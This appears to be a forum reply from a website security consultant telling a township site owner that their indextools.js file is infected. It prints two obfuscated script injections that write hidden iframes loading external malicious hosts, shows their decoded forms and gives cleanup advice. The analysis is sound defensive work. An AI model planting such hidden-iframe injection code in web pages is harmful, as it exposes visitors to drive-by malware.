In your file: www.durhamtownship.com/indextools.js you have some malscript (spaces added to protect the innocent) :

do cu me nt.w ri te(un es ca pe(‘3C%69%66%72%61%6D%65%20%73%72%63%3D
27%68%74%74%70%3A%2F%2F%74%72%61%66%66%69%63%69%6E%63%2E%72%75%
2F%69%6E%64%65%78%2E%70%68%70%27%20%77%69%64%74%68%3D%27%31%27%
20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76%69%
73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%
69%66%72%61%6D%65%3E’));

Which deobfuscates to (iframe tags removed to protect the innocent and http changed to hxxp):

src=‘hxxp://trafficinc.ru/index.php’ width=‘1’ height=‘1’ style=‘visibility: hidden;’>

This malscript is in the first line of the above referenced file.

In addition in that same file in the last line you have:

f un c ti on uavxgizkldzyckm(fuqgkpou){var dtzhtxkdkr="";for
(dolnbjhcfei=0;dolnbjhcfei<fuqgkpou.length;dolnbjhcfei+=2){dtzhtxkdkr+=
(String.fromCharCode(parseInt(fuqgkpou.substr(dolnbjhcfei,2),16)));}
document.write(dtzhtxkdkr);}uavxgizkldzyckm
(“3C69eiqpxekm66eiqpxekm72eiqpxekm616D652073eiqpxekm72633D226874eiqp
xekm74eiqpxekm70eiqpxekm3Aeiqpxekm2F2F746Feiqpxekm703130302D636F756
E74eiqpxekm65722E636Feiqpxekm6Deiqpxekm2Feiqpxekm746Feiqpxekm70eiqpx
ekm3130302F69eiqpxekm6E6465782E70eiqpxekm68eiqpxekm70eiqpxekm22eiqp
xekm20eiqpxekm66eiqpxekm72eiqpxekm61eiqpxekm6D65626Feiqpxekm72eiqpx
ekm64eiqpxekm6572eiqpxekm3D22eiqpxekm30eiqpxekm2220eiqpxekm626F72ei
qpxekm646572eiqpxekm3D2230eiqpxekm22eiqpxekm20eiqpxekm7769eiqpxekm6
4eiqpxekm7468eiqpxekm3Deiqpxekm22eiqpxekm30222068eiqpxekm65eiqpxekm
69eiqpxekm67eiqpxekm68eiqpxekm743Deiqpxekm22302220737479eiqpxekm6Cei
qpxekm65eiqpxekm3D22eiqpxekm70eiqpxekm6Feiqpxekm73eiqpxekm6974eiqpx
ekm69eiqpxekm6F6E3A206162eiqpxekm736F6C757465eiqpxekm3B20eiqpxekm76
697369eiqpxekm62eiqpxekm696C69eiqpxekm74793A20eiqpxekm68696464eiqpxe
km65eiqpxekm6Eeiqpxekm3B2064eiqpxekm69eiqpxekm73eiqpxekm70eiqpxekm6
Ceiqpxekm61793Aeiqpxekm206E6F6E65eiqpxekm22eiqpxekm3Eeiqpxekm3Ceiqp
xekm2Feiqpxekm696672eiqpxekm61eiqpxekm6Deiqpxekm65eiqpxekm3Eeiqpxek
m”.replace(/eiqpxekm/g, ""));

Which deobfuscates to (iframe tags removed):

src=“http://top100-counter.com/top100/index.php” frameborder=“0” border=“0” width=“0” height=“0” style=“position: absolute; visibility: hidden; display: none”>

Which Google lists as suspicious.

Remove those 2 lines from your indextools.js and request a review from Google, after changing your FTP password and scanning all PCs that upload via FTP to your website, for viruses with something other than what you currently use and you’ll more than likely stop getting hacked.

Let the group here know of your progress or questions.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com